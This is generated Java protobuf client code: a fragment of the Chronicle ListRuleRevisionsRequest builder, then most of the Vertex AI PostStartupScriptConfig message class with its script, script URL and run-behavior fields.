/** * * * <pre> * Required. The name of the rule to list revisions for. * Format: * `projects/{project}/locations/{location}/instances/{instance}/rules/{rule}` * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return This builder for chaining. */ public Builder clearName() { name_ = getDefaultInstance().getName(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); return this; } /** * * * <pre> * Required. The name of the rule to list revisions for. * Format: * `projects/{project}/locations/{location}/instances/{instance}/rules/{rule}` * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @param value The bytes for name to set. * @return This builder for chaining. */ public Builder setNameBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); name_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } private int pageSize_; /** * * * <pre> * The maximum number of revisions to return per page. The service may return * fewer than this value. If unspecified, at most 100 revisions will be * returned. The maximum value is 1000; values above 1000 will be coerced to * 1000. * </pre> * * <code>int32 page_size = 2;</code> * * @return The pageSize. */ @java.lang.Override public int getPageSize() { return pageSize_; } /** * * * <pre> * The maximum number of revisions to return per page. The service may return * fewer than this value. If unspecified, at most 100 revisions will be * returned. The maximum value is 1000; values above 1000 will be coerced to * 1000. * </pre> * * <code>int32 page_size = 2;</code> * * @param value The pageSize to set. * @return This builder for chaining. */ public Builder setPageSize(int value) { pageSize_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * The maximum number of revisions to return per page. The service may return * fewer than this value. If unspecified, at most 100 revisions will be * returned. The maximum value is 1000; values above 1000 will be coerced to * 1000. * </pre> * * <code>int32 page_size = 2;</code> * * @return This builder for chaining. */ public Builder clearPageSize() { bitField0_ = (bitField0_ & ~0x00000002); pageSize_ = 0; onChanged(); return this; } private java.lang.Object pageToken_ = ""; /** * * * <pre> * The page token, received from a previous `ListRuleRevisions` call. * Provide this to retrieve the subsequent page. * * When paginating, all other parameters provided to `ListRuleRevisions` * must match the call that provided the page token. * </pre> * * <code>string page_token = 3;</code> * * @return The pageToken. */ public java.lang.String getPageToken() { java.lang.Object ref = pageToken_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); pageToken_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * The page token, received from a previous `ListRuleRevisions` call. * Provide this to retrieve the subsequent page. * * When paginating, all other parameters provided to `ListRuleRevisions` * must match the call that provided the page token. * </pre> * * <code>string page_token = 3;</code> * * @return The bytes for pageToken. */ public com.google.protobuf.ByteString getPageTokenBytes() { java.lang.Object ref = pageToken_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); pageToken_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * The page token, received from a previous `ListRuleRevisions` call. * Provide this to retrieve the subsequent page. * * When paginating, all other parameters provided to `ListRuleRevisions` * must match the call that provided the page token. * </pre> * * <code>string page_token = 3;</code> * * @param value The pageToken to set. * @return This builder for chaining. */ public Builder setPageToken(java.lang.String value) { if (value == null) { throw new NullPointerException(); } pageToken_ = value; bitField0_ |= 0x00000004; onChanged(); return this; } /** * * * <pre> * The page token, received from a previous `ListRuleRevisions` call. * Provide this to retrieve the subsequent page. * * When paginating, all other parameters provided to `ListRuleRevisions` * must match the call that provided the page token. * </pre> * * <code>string page_token = 3;</code> * * @return This builder for chaining. */ public Builder clearPageToken() { pageToken_ = getDefaultInstance().getPageToken(); bitField0_ = (bitField0_ & ~0x00000004); onChanged(); return this; } /** * * * <pre> * The page token, received from a previous `ListRuleRevisions` call. * Provide this to retrieve the subsequent page. * * When paginating, all other parameters provided to `ListRuleRevisions` * must match the call that provided the page token. * </pre> * * <code>string page_token = 3;</code> * * @param value The bytes for pageToken to set. * @return This builder for chaining. */ public Builder setPageTokenBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); pageToken_ = value; bitField0_ |= 0x00000004; onChanged(); return this; } private int view_ = 0; /** * * * <pre> * The view field indicates the scope of fields to populate for the revision * being returned. If unspecified, defaults to BASIC. * </pre> * * <code>.google.cloud.chronicle.v1.RuleView view = 4;</code> * * @return The enum numeric value on the wire for view. */ @java.lang.Override public int getViewValue() { return view_; } /** * * * <pre> * The view field indicates the scope of fields to populate for the revision * being returned. If unspecified, defaults to BASIC. * </pre> * * <code>.google.cloud.chronicle.v1.RuleView view = 4;</code> * * @param value The enum numeric value on the wire for view to set. * @return This builder for chaining. */ public Builder setViewValue(int value) { view_ = value; bitField0_ |= 0x00000008; onChanged(); return this; } /** * * * <pre> * The view field indicates the scope of fields to populate for the revision * being returned. If unspecified, defaults to BASIC. * </pre> * * <code>.google.cloud.chronicle.v1.RuleView view = 4;</code> * * @return The view. */ @java.lang.Override public com.google.cloud.chronicle.v1.RuleView getView() { com.google.cloud.chronicle.v1.RuleView result = com.google.cloud.chronicle.v1.RuleView.forNumber(view_); return result == null ? com.google.cloud.chronicle.v1.RuleView.UNRECOGNIZED : result; } /** * * * <pre> * The view field indicates the scope of fields to populate for the revision * being returned. If unspecified, defaults to BASIC. * </pre> * * <code>.google.cloud.chronicle.v1.RuleView view = 4;</code> * * @param value The view to set. * @return This builder for chaining. */ public Builder setView(com.google.cloud.chronicle.v1.RuleView value) { if (value == null) { throw new NullPointerException(); } bitField0_ |= 0x00000008; view_ = value.getNumber(); onChanged(); return this; } /** * * * <pre> * The view field indicates the scope of fields to populate for the revision * being returned. If unspecified, defaults to BASIC. * </pre> * * <code>.google.cloud.chronicle.v1.RuleView view = 4;</code> * * @return This builder for chaining. */ public Builder clearView() { bitField0_ = (bitField0_ & ~0x00000008); view_ = 0; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.chronicle.v1.ListRuleRevisionsRequest) } // @@protoc_insertion_point(class_scope:google.cloud.chronicle.v1.ListRuleRevisionsRequest) private static final com.google.cloud.chronicle.v1.ListRuleRevisionsRequest DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.chronicle.v1.ListRuleRevisionsRequest(); } public static com.google.cloud.chronicle.v1.ListRuleRevisionsRequest getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<ListRuleRevisionsRequest> PARSER = new com.google.protobuf.AbstractParser<ListRuleRevisionsRequest>() { @java.lang.Override public ListRuleRevisionsRequest parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<ListRuleRevisionsRequest> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<ListRuleRevisionsRequest> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.chronicle.v1.ListRuleRevisionsRequest getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleapis/google-cloud-java
35,925
java-aiplatform/proto-google-cloud-aiplatform-v1beta1/src/main/java/com/google/cloud/aiplatform/v1beta1/PostStartupScriptConfig.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/aiplatform/v1beta1/notebook_software_config.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.aiplatform.v1beta1; /** Protobuf type {@code google.cloud.aiplatform.v1beta1.PostStartupScriptConfig} */ public final class PostStartupScriptConfig extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.aiplatform.v1beta1.PostStartupScriptConfig) PostStartupScriptConfigOrBuilder { private static final long serialVersionUID = 0L; // Use PostStartupScriptConfig.newBuilder() to construct. private PostStartupScriptConfig(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private PostStartupScriptConfig() { postStartupScript_ = ""; postStartupScriptUrl_ = ""; postStartupScriptBehavior_ = 0; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new PostStartupScriptConfig(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.aiplatform.v1beta1.NotebookSoftwareConfigProto .internal_static_google_cloud_aiplatform_v1beta1_PostStartupScriptConfig_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.aiplatform.v1beta1.NotebookSoftwareConfigProto .internal_static_google_cloud_aiplatform_v1beta1_PostStartupScriptConfig_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.class, com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.Builder.class); } /** * Protobuf enum {@code * google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior} */ public enum PostStartupScriptBehavior implements com.google.protobuf.ProtocolMessageEnum { /** <code>POST_STARTUP_SCRIPT_BEHAVIOR_UNSPECIFIED = 0;</code> */ POST_STARTUP_SCRIPT_BEHAVIOR_UNSPECIFIED(0), /** <code>RUN_ONCE = 1;</code> */ RUN_ONCE(1), /** <code>RUN_EVERY_START = 2;</code> */ RUN_EVERY_START(2), /** <code>DOWNLOAD_AND_RUN_EVERY_START = 3;</code> */ DOWNLOAD_AND_RUN_EVERY_START(3), UNRECOGNIZED(-1), ; /** <code>POST_STARTUP_SCRIPT_BEHAVIOR_UNSPECIFIED = 0;</code> */ public static final int POST_STARTUP_SCRIPT_BEHAVIOR_UNSPECIFIED_VALUE = 0; /** <code>RUN_ONCE = 1;</code> */ public static final int RUN_ONCE_VALUE = 1; /** <code>RUN_EVERY_START = 2;</code> */ public static final int RUN_EVERY_START_VALUE = 2; /** <code>DOWNLOAD_AND_RUN_EVERY_START = 3;</code> */ public static final int DOWNLOAD_AND_RUN_EVERY_START_VALUE = 3; public final int getNumber() { if (this == UNRECOGNIZED) { throw new java.lang.IllegalArgumentException( "Can't get the number of an unknown enum value."); } return value; } /** * @param value The numeric wire value of the corresponding enum entry. * @return The enum associated with the given numeric wire value. * @deprecated Use {@link #forNumber(int)} instead. */ @java.lang.Deprecated public static PostStartupScriptBehavior valueOf(int value) { return forNumber(value); } /** * @param value The numeric wire value of the corresponding enum entry. * @return The enum associated with the given numeric wire value. */ public static PostStartupScriptBehavior forNumber(int value) { switch (value) { case 0: return POST_STARTUP_SCRIPT_BEHAVIOR_UNSPECIFIED; case 1: return RUN_ONCE; case 2: return RUN_EVERY_START; case 3: return DOWNLOAD_AND_RUN_EVERY_START; default: return null; } } public static com.google.protobuf.Internal.EnumLiteMap<PostStartupScriptBehavior> internalGetValueMap() { return internalValueMap; } private static final com.google.protobuf.Internal.EnumLiteMap<PostStartupScriptBehavior> internalValueMap = new com.google.protobuf.Internal.EnumLiteMap<PostStartupScriptBehavior>() { public PostStartupScriptBehavior findValueByNumber(int number) { return PostStartupScriptBehavior.forNumber(number); } }; public final com.google.protobuf.Descriptors.EnumValueDescriptor getValueDescriptor() { if (this == UNRECOGNIZED) { throw new java.lang.IllegalStateException( "Can't get the descriptor of an unrecognized enum value."); } return getDescriptor().getValues().get(ordinal()); } public final com.google.protobuf.Descriptors.EnumDescriptor getDescriptorForType() { return getDescriptor(); } public static final com.google.protobuf.Descriptors.EnumDescriptor getDescriptor() { return com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.getDescriptor() .getEnumTypes() .get(0); } private static final PostStartupScriptBehavior[] VALUES = values(); public static PostStartupScriptBehavior valueOf( com.google.protobuf.Descriptors.EnumValueDescriptor desc) { if (desc.getType() != getDescriptor()) { throw new java.lang.IllegalArgumentException("EnumValueDescriptor is not for this type."); } if (desc.getIndex() == -1) { return UNRECOGNIZED; } return VALUES[desc.getIndex()]; } private final int value; private PostStartupScriptBehavior(int value) { this.value = value; } // @@protoc_insertion_point(enum_scope:google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior) } public static final int POST_STARTUP_SCRIPT_FIELD_NUMBER = 1; @SuppressWarnings("serial") private volatile java.lang.Object postStartupScript_ = ""; /** * <code>string post_startup_script = 1 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The postStartupScript. */ @java.lang.Override public java.lang.String getPostStartupScript() { java.lang.Object ref = postStartupScript_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); postStartupScript_ = s; return s; } } /** * <code>string post_startup_script = 1 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The bytes for postStartupScript. */ @java.lang.Override public com.google.protobuf.ByteString getPostStartupScriptBytes() { java.lang.Object ref = postStartupScript_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); postStartupScript_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int POST_STARTUP_SCRIPT_URL_FIELD_NUMBER = 2; @SuppressWarnings("serial") private volatile java.lang.Object postStartupScriptUrl_ = ""; /** * <code>string post_startup_script_url = 2 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The postStartupScriptUrl. */ @java.lang.Override public java.lang.String getPostStartupScriptUrl() { java.lang.Object ref = postStartupScriptUrl_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); postStartupScriptUrl_ = s; return s; } } /** * <code>string post_startup_script_url = 2 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The bytes for postStartupScriptUrl. */ @java.lang.Override public com.google.protobuf.ByteString getPostStartupScriptUrlBytes() { java.lang.Object ref = postStartupScriptUrl_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); postStartupScriptUrl_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int POST_STARTUP_SCRIPT_BEHAVIOR_FIELD_NUMBER = 3; private int postStartupScriptBehavior_ = 0; /** * <code> * .google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior post_startup_script_behavior = 3 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @return The enum numeric value on the wire for postStartupScriptBehavior. */ @java.lang.Override public int getPostStartupScriptBehaviorValue() { return postStartupScriptBehavior_; } /** * <code> * .google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior post_startup_script_behavior = 3 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @return The postStartupScriptBehavior. */ @java.lang.Override public com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior getPostStartupScriptBehavior() { com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior result = com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior .forNumber(postStartupScriptBehavior_); return result == null ? com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior .UNRECOGNIZED : result; } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(postStartupScript_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 1, postStartupScript_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(postStartupScriptUrl_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 2, postStartupScriptUrl_); } if (postStartupScriptBehavior_ != com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior .POST_STARTUP_SCRIPT_BEHAVIOR_UNSPECIFIED .getNumber()) { output.writeEnum(3, postStartupScriptBehavior_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(postStartupScript_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(1, postStartupScript_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(postStartupScriptUrl_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, postStartupScriptUrl_); } if (postStartupScriptBehavior_ != com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior .POST_STARTUP_SCRIPT_BEHAVIOR_UNSPECIFIED .getNumber()) { size += com.google.protobuf.CodedOutputStream.computeEnumSize(3, postStartupScriptBehavior_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig)) { return super.equals(obj); } com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig other = (com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig) obj; if (!getPostStartupScript().equals(other.getPostStartupScript())) return false; if (!getPostStartupScriptUrl().equals(other.getPostStartupScriptUrl())) return false; if (postStartupScriptBehavior_ != other.postStartupScriptBehavior_) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); hash = (37 * hash) + POST_STARTUP_SCRIPT_FIELD_NUMBER; hash = (53 * hash) + getPostStartupScript().hashCode(); hash = (37 * hash) + POST_STARTUP_SCRIPT_URL_FIELD_NUMBER; hash = (53 * hash) + getPostStartupScriptUrl().hashCode(); hash = (37 * hash) + POST_STARTUP_SCRIPT_BEHAVIOR_FIELD_NUMBER; hash = (53 * hash) + postStartupScriptBehavior_; hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder( com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** Protobuf type {@code google.cloud.aiplatform.v1beta1.PostStartupScriptConfig} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.aiplatform.v1beta1.PostStartupScriptConfig) com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfigOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.aiplatform.v1beta1.NotebookSoftwareConfigProto .internal_static_google_cloud_aiplatform_v1beta1_PostStartupScriptConfig_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.aiplatform.v1beta1.NotebookSoftwareConfigProto .internal_static_google_cloud_aiplatform_v1beta1_PostStartupScriptConfig_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.class, com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.Builder.class); } // Construct using com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; postStartupScript_ = ""; postStartupScriptUrl_ = ""; postStartupScriptBehavior_ = 0; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.aiplatform.v1beta1.NotebookSoftwareConfigProto .internal_static_google_cloud_aiplatform_v1beta1_PostStartupScriptConfig_descriptor; } @java.lang.Override public com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig getDefaultInstanceForType() { return com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.getDefaultInstance(); } @java.lang.Override public com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig build() { com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig buildPartial() { com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig result = new com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0(com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000001) != 0)) { result.postStartupScript_ = postStartupScript_; } if (((from_bitField0_ & 0x00000002) != 0)) { result.postStartupScriptUrl_ = postStartupScriptUrl_; } if (((from_bitField0_ & 0x00000004) != 0)) { result.postStartupScriptBehavior_ = postStartupScriptBehavior_; } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig) { return mergeFrom((com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig other) { if (other == com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.getDefaultInstance()) return this; if (!other.getPostStartupScript().isEmpty()) { postStartupScript_ = other.postStartupScript_; bitField0_ |= 0x00000001; onChanged(); } if (!other.getPostStartupScriptUrl().isEmpty()) { postStartupScriptUrl_ = other.postStartupScriptUrl_; bitField0_ |= 0x00000002; onChanged(); } if (other.postStartupScriptBehavior_ != 0) { setPostStartupScriptBehaviorValue(other.getPostStartupScriptBehaviorValue()); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { postStartupScript_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000001; break; } // case 10 case 18: { postStartupScriptUrl_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000002; break; } // case 18 case 24: { postStartupScriptBehavior_ = input.readEnum(); bitField0_ |= 0x00000004; break; } // case 24 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.lang.Object postStartupScript_ = ""; /** * <code>string post_startup_script = 1 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The postStartupScript. */ public java.lang.String getPostStartupScript() { java.lang.Object ref = postStartupScript_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); postStartupScript_ = s; return s; } else { return (java.lang.String) ref; } } /** * <code>string post_startup_script = 1 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The bytes for postStartupScript. */ public com.google.protobuf.ByteString getPostStartupScriptBytes() { java.lang.Object ref = postStartupScript_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); postStartupScript_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * <code>string post_startup_script = 1 [(.google.api.field_behavior) = OPTIONAL];</code> * * @param value The postStartupScript to set. * @return This builder for chaining. */ public Builder setPostStartupScript(java.lang.String value) { if (value == null) { throw new NullPointerException(); } postStartupScript_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } /** * <code>string post_startup_script = 1 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return This builder for chaining. */ public Builder clearPostStartupScript() { postStartupScript_ = getDefaultInstance().getPostStartupScript(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); return this; } /** * <code>string post_startup_script = 1 [(.google.api.field_behavior) = OPTIONAL];</code> * * @param value The bytes for postStartupScript to set. * @return This builder for chaining. */ public Builder setPostStartupScriptBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); postStartupScript_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } private java.lang.Object postStartupScriptUrl_ = ""; /** * <code>string post_startup_script_url = 2 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The postStartupScriptUrl. */ public java.lang.String getPostStartupScriptUrl() { java.lang.Object ref = postStartupScriptUrl_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = 